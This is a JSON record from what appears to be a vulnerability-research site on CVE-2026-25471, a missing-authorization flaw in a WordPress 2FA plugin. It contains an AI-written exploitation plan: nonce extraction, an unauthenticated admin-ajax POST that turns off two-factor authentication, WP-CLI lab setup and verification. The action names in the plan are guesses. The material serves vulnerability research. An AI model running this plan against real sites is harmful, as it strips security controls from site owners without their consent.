[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ1Q9F-u4uQLofUutvloTgkei1tk03rzVlmneX-nrBdw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2026-25471","admin-safety-guard-login-security-2fa-missing-authorization","Admin Safety Guard — Login Security & 2FA \u003C= 1.2.6 - Missing Authorization","The Admin Safety Guard — Login Security & 2FA plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","admin-safety-guard",null,"\u003C=1.2.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-16 00:00:00","2026-03-27 20:53:27",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F74b4a2c0-a3c1-4049-aea7-133408ebdf32?source=api-prod",[],"researched",false,3,"This exploitation research plan target CVE-2026-25471 in the **Admin Safety Guard — Login Security & 2FA** plugin. The vulnerability is a \"Missing Authorization\" flaw, which typically means an administrative function is exposed via a `wp_ajax_nopriv_` hook or a REST API route without a `current_user_can()` check.\n\n---\n\n### 1. Vulnerability Summary\nThe **Admin Safety Guard** plugin (up to version 1.2.6) registers one or more AJAX handlers or REST API endpoints that perform sensitive administrative actions (e.g., modifying security settings, clearing logs, or whitelisting IPs). Because these handlers are registered for unauthenticated users (`wp_ajax_nopriv_`) and fail to verify the caller's capabilities, an unauthenticated attacker can manipulate the plugin's security configurations.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** Likely `asg_save_settings`, `asg_clear_logs`, or `asg_update_whitelist` (inferred; agent must verify via `grep`).\n*   **Authentication:** None (Unauthenticated).\n*   **Vulnerable Parameter:** Likely a `settings` array or individual configuration keys passed via `$_POST`.\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin uses `add_action( 'wp_ajax_nopriv_VULNERABLE_ACTION', 'callback_function' )`.\n2.  **Entry Point:** An unauthenticated HTTP POST request is sent to `admin-ajax.php?action=VULNERABLE_ACTION`.\n3.  **Missing Check:** The `callback_function` calls `check_ajax_referer()` (verifying the nonce) but fails to call `current_user_can( 'manage_options' )`.\n4.  **Sink:** The function proceeds to call `update_option()` or `global $wpdb; $wpdb->query(...)` to modify plugin state.\n\n### 4. Nonce Acquisition Strategy\nMissing Authorization vulnerabilities often still require a valid Nonce for CSRF protection. To exploit this as an unauthenticated user, we must find where the plugin leaks the nonce to the frontend.\n\n1.  **Identify the Script\u002FVariable:** Search for `wp_localize_script` in the plugin code to find the JS object containing the nonce.\n    *   *Search command:* `grep -rn \"wp_localize_script\" .`\n2.  **Determine the Triggering Content:** Identify if the script is enqueued on the homepage or requires a specific shortcode.\n    *   *Search command:* `grep -rn \"add_shortcode\" .`\n3.  **Extraction Steps:**\n    *   **Step A:** Create a page with the identified shortcode (if necessary):\n        `wp post create --post_type=page --post_status=publish --post_content='[shortcode_found]'`\n    *   **Step B:** Use `browser_navigate` to view the page.\n    *   **Step C:** Use `browser_eval` to extract the nonce.\n        *   *Example Variable (verify in source):* `window.asg_vars?.nonce` or `window.asg_ajax_object?.security`.\n\n### 5. Exploitation Strategy\nOnce the action name and nonce are identified, follow these steps:\n\n1.  **Discovery:** Run the following to find the specific vulnerable action:\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" .\n    ```\n    Examine the callback functions. Look for those that update options but lack `current_user_can`.\n\n2.  **Target Action (Example: `asg_save_settings`):**\n    If the function is `asg_save_settings_callback`, look at the `$_POST` parameters it expects (e.g., `settings_data`).\n\n3.  **HTTP Request via `http_request`:**\n    ```javascript\n    \u002F\u002F Example Payload to disable a security feature (e.g., 2FA)\n    {\n      \"method\": \"POST\",\n      \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n      \"headers\": {\n        \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n      },\n      \"body\": \"action=asg_save_settings&security=EXTRACTED_NONCE&asg_options[enable_2fa]=0\"\n    }\n    ```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `admin-safety-guard` v1.2.6 is installed.\n2.  **Configure Settings:** Use WP-CLI to enable a security setting that you intend to disable via the exploit:\n    `wp option update asg_settings '{\"enable_2fa\":\"1\", \"whitelist_ip\":\"\"}' --format=json`\n3.  **Create Nonce Source:** If the nonce is only on specific pages, create that page:\n    `wp post create --post_type=page --post_title=\"Security\" --post_status=publish --post_content='[asg_login_form]'` (Example shortcode).\n\n### 7. Expected Results\n*   **Response:** The server should return a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n*   **State Change:** The targeted WordPress option (e.g., `asg_settings`) is updated in the database, effectively disabling security controls.\n\n### 8. Verification Steps\nAfter the `http_request`, verify the change via WP-CLI:\n```bash\n# Check if the setting was modified\nwp option get asg_settings --format=json\n```\nIf the exploit was to whitelist an IP, check the specific option or database table:\n```bash\nwp db query \"SELECT * FROM wp_options WHERE option_name = 'asg_whitelist'\"\n```\n\n### 9. Alternative Approaches\n*   **REST API:** If no AJAX handlers are found, search for `register_rest_route`. Look for routes where `permission_callback` is set to `__return_true` or is missing.\n    *   *Search command:* `grep -rn \"register_rest_route\" . -A 5`\n*   **Direct Option Update:** Some plugins use `admin_init` hooks that don't check for AJAX\u002FREST context. Check for functions hooked to `admin_init` that process `$_POST` directly.\n    *   *Search command:* `grep -rn \"add_action.*admin_init\" .` (Note: `admin_init` also runs on `admin-ajax.php`).","The Admin Safety Guard — Login Security & 2FA plugin for WordPress is vulnerable to unauthorized access because it registers administrative AJAX actions for unauthenticated users without performing capability checks. This allows unauthenticated attackers to modify security configurations, such as disabling Two-Factor Authentication or clearing security logs.","To exploit this vulnerability, an unauthenticated attacker first obtains a valid AJAX nonce by inspecting the frontend of the site, where the plugin localizes script variables (e.g., in a JS object like asg_vars). Using this nonce, the attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with an action parameter corresponding to an administrative function (such as asg_save_settings) and parameters intended to overwrite security options. Because the plugin uses wp_ajax_nopriv_ hooks and lacks current_user_can() checks in the callback functions, the request is processed despite the lack of authentication.","gemini-3-flash-preview","2026-04-18 03:30:34","2026-04-18 03:30:54",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadmin-safety-guard\u002Ftags"]